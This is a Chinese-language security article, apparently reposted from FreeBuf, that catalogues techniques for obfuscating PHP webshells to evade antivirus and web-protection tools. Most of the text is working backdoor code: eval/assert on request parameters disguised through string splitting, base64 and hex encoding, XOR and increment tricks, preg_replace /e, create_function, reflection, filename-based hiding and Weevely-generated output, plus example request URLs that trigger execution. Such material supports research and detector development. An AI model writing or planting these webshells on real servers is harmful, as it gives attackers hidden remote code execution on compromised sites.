简介
WebShell的变形技术与各种防护软件的检测方法一直都在相互对抗,本篇文章就对目前常见的WebShell的变形技术进行总结。
目前的防护软件对能够执行命令函数和能够执行代码的函数都会格外的敏感,如eavl
、assert
、system
、popen
、shell_exec
,所以像最为简单的eval($_POST[cmd])
的一句话就一定会被查杀。所以目前的变形的本质都在于如何隐藏自己的敏感函数。
巧用$GPC
利用$GLOBALS
1 | 复制代码@eval($GLOBALS['_POST']['op']); |
很多的防护软件仅仅只是检查$_POST
,所以通过$GLOBALS
就能够逃过查杀。
利用$_FILE
1 | 复制代码@eval($_FILE['name']); |
使用$_FILE
就能够逃脱很多防护软件了。
关键字替换
敏感函数拆分
由于PHP语法的灵活性,这种写法就会有很多了。比如
1 | 复制代码$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']); |
这种就是利用PHP的可变函数来拆分assert
关键字。但是这种拆分方式也比较的简单,目前的防护软件已经可以识别了。
这种方式也可以变形一下,将assert
放置在函数里面。如下:
1 | 复制代码function func() { |
基于这种方式还可以进行更多的变形,在这里就不进行说明了。
空格替换&字符串替换
1 | 复制代码<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = ")));?> |
首先将关键函数进行倒转和空格,之后利用strrev
和str_replace
恢复。不同于之前的字符串拼接,这种方式采用的是将字符串进行各种变形达到隐藏敏感函数的目的,这种方式在一定程度上能够有效地躲避查杀。
特殊字符
这种特殊字符组成的webshell其实也算是关键字替换中的,但是这种由特殊字符串组成的webshell经常被讨论,所以在这里单独作为一小节进行说明。
进制运算
1 | 复制代码@$_++; |
通过异或运算(^
)、取反运算(!
)的方式组成一个webshell。
自增运算
因为在PHP中,'a'++ => 'b'
,'b'++ => 'c'
,所以我们如果得到了其中的一个字母,通过这个字符就可以得到所有的字母。通过$_=[];$_=@"$_";;
得到$_
为Array
的字符串,那么就可以得到所有的字符串了。
1 | 复制代码$_=[]; |
关于这种由特殊字符组成的webshell可以参考P神写的一些不包含数字和字母的webshell
利用注释
1 | 复制代码@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; |
通过特色符号和注释组合组成一个webshell,也能够隐藏关键字。
异或运算&字符编码
这种异或运算得到的webshell与上面讲的通过异或运算不完全一样。在特定的编码情况下,一些字符串经过异或运算就能够得到一些特定的函数,这些函数就可以用于构造webshell。
1 | 复制代码$y=~督耽孩^'(1987)'; |
上述的代码需要以GBK
的方式保存,其中的$y
的值为assert
,这样就是一个典型的webshell了。
还有如下这种:
1 | 复制代码$x=~Ÿ¬¬º«; |
上述的代码需要以ISO-8859-15
保存,其中的$x
为assert
,而~¹¹ÏÏÏÏ
是FF0000
。即使是这种方式,部分的防护软件还是能够识别。
eval&base64_decode变形
通过对大量的webshell分析,发现很多的webshell其实都是eval(base64_decode($_POST[cmd]))
这种方式的变形。变形的核心思想其实就是将base64_decode
、$_POST
隐藏。下面就对这几种变形的方法进行说明。
字符串&数组的方式
这种方式一般都是先声明字符串,之后通过从字符串中进行取值,得到所需要的敏感函数。如下:
1 | 复制代码$sF = "PCT4BA6ODSE_"; |
通过字符串PCT4BA6ODSE_
得到,$s21
为base64_decode
,$s22
为${"_POST"}['n985de9']
,所以这种方式最后的代码其实就是eval(base64_decode($_POST['n985de9']));
进制转换
这种方式在webshell中也是比较常见的。
1 | 复制代码$v230c590="\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"; |
其中$v230c590
就是base64_decode
,通过十六进制和八进制混用的方式代替base64_decode
。还有如下这种形式
1 | 复制代码$liner = "pr"."e"."g_"."re"."p"."l"."ace"; |
其中\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28
其实为eval(gzuncompress(base64_decode(
也达到了隐藏敏感函数的目的。
反序列化执行
通过序列化的方式,我们也能够执行webshell。
1 | 复制代码class foo{ |
我们需要在本地构造序列化的数据。构造好了之后,通过shell.php?id=id=O:3:"foo":1:{s:4:"data";s:10:"phpinfo();";}
,这样就能够执行phpinfo();
命令了。
回调函数
PHP中的回调函数非常之多,所以通过回调函数执行Webshell的方式也非常的多。最常见的回调函数的写法就是$ant=create_function("","eval($_POST[cmd]);");$ant();
。但是目前大部分的防护软件都都已经能够识别这种写法的webshell,所以目前的回调函数方法变形一般都是通过其他的不常见的回调函数以及变换关键代码。
create_function的变形
基于create_function的变形是非常多的。如下面两种:
变形一:
1 | 复制代码$function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function(); |
变形二:
1 | 复制代码$function = create_function('$code',base64_decode('ZXZhbCgkX0dFVFsidGVzdCJdKTs=')); |
总体来说这种方法和上面讲的关键字替换是类似的
preg_replace变形
通过preg_replace
的\e
模式下能够执行代码这种方式也是十分常见的,很多攻击者都喜欢使用preg_replace
。下面就提供三种变形。
变形一:
1 | 复制代码@$a = $_POST['x']; |
通过base64编码将关键代码隐藏。
变形二:
1 | 复制代码function funfunc($str) {} |
这种方式其实还利用了PHP中的可变变量能够执行代码的特点。通过cmd=<title>${@eval($_POST[xxx])}</title>&xxx=phpinfo();
这种方式就可以执行任意的代码了。
变形三:
在php中也有几个和preg_replace类似的函数可以使用,如mb_ereg_replace
、preg_filter
。用法如下:
1 | 复制代码mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e'); |
在PHP中这种动态函数是非常多的,除了上述说的create_function
,preg_replace
,还有诸如call_user_func
、 call_user_func_array
。还可以利用一些不常见的回调函数,如array_map
、array_filter
、array_reduce
、array_udiff
这种方式,还有很多其他的回调函数可供使用。P神也写过一篇关于用回调函数构造webshell的文章,
创造tips的秘籍——PHP回调后门。
动态函数执行
1 | 复制代码$dyn_func = $_GET['dyn_func']; |
这种动态函数的变形目前已经被广泛地使用,目前大部分的防护软件都能够识别。
利用文件名&注释
一般情况下,防护软件在检测Webshell时一般都会忽略掉文件名和文件中的注释,那么我们就可以在文件名和注释中放入敏感函数。
巧用文件名
no_assert.php
1 | 复制代码<?php |
这种,得到的$function
就是assert
,这样就形成了assert($_POST[cmd]);
的后门。
$_POST[cmd].php
1 | 复制代码<?php |
这个是将$_POST[cmd]
放置在文件名中进行隐藏,同样可以达到隐藏的目的。
自定义函数
为了能够逃避防护软件的查杀,很多webshell都会自己编写加密函数或者是字符串转换函数。下面就几个函数进行说明。
十六进制执行
1 | 复制代码$string=''; |
只需要将传入的指令变为16进制的字符串即可。shell.php?test=706870696e666f28293b
。其中的706870696e666f28293b
就是phpinfo();
的十六进制,用法和普通的webshell没有区别。
自定义加密
1 | 复制代码function decode($string) { |
这个加密函数十分的简单,仅仅是将字母的ascii值减3而已,算是比较简单的加密算法。
1 | 复制代码decode("Chydo+'bSRVW^fpg`,>") |
得到就是@eval($_POST[cmd]);
。
反射技术
1 | 复制代码$func = new ReflectionFunction($_GET[m]); |
这种方式调用起来也非常的简单xx.com/shell.php?m=assert&c=phpinfo();
和动态函数执行的方式十分的相似。但是目前这种方式已经被各种安全防护软件识别了。
文件加密
加密的方式就非常多了,包括使用开源的webshell工具或者是网上在线的加密方法或者是自己编写加密代码进行混淆加密。
混淆加密
1 | 复制代码$M_='TcynUS2Dj'|Xtt1C5;$xPAsA3='|L#K1)'^'=`'.tosl;$ps6U8r2u='S R'|'Z @';'F_fTJ4U3M'. |
以上就是一个自定义被加密的webshell,主要是利用了各种位运算符达到混淆加密的目的。
使用加密工具加密
国内的工具还是有很多的,包括phpjm,phpjiami通过测试,即使是最为简单的@eval($_POST[cmd])
,经过加密之后还是很多防护软件无法识别出webshell。
Weevely
weevely是一款使用python编写的webshell工具,Github地址下面就是weevely3
生成的朴php 代码:
1 | 复制代码$L='O=$_SERVE9OR;$rr9O=@$r["H9OTTP_9OREFERER9O"];$ra=9O@$r["H9OTT9OP_9O9OACCEPT_LANGUAGE"]9O;if($9O9Orr&&$ra'; |
看起来完全是毫无意义的代码。但是即使是这样,D盾还是能够识别。
总结
本篇文章对目前PHP中的常见的webshell变形技术进行了总结归纳,可以发现这些变形技术都大量地使用了PHP的语言特性。由于PHP的灵活的语法以及大量的内置函数,导致webshell可以有各种各样的变形技术。多样的变形技术不仅可以让攻击者写出更加隐蔽的webshell,也增加了防护软件识别的难度。webshell的变形技术就在攻击者与防护软件的对抗中也不断的演变和升级。本篇文章也只是对于总结了各种防护方法,关于其中的变形原理就不进行详细地说明了。
彩蛋
1 | 复制代码 /** |
参考
www.leavesongs.com/PENETRATION…
* 本文作者:影武者实验室,转载请注明来自Freebuf.COM
本文转载自: 掘金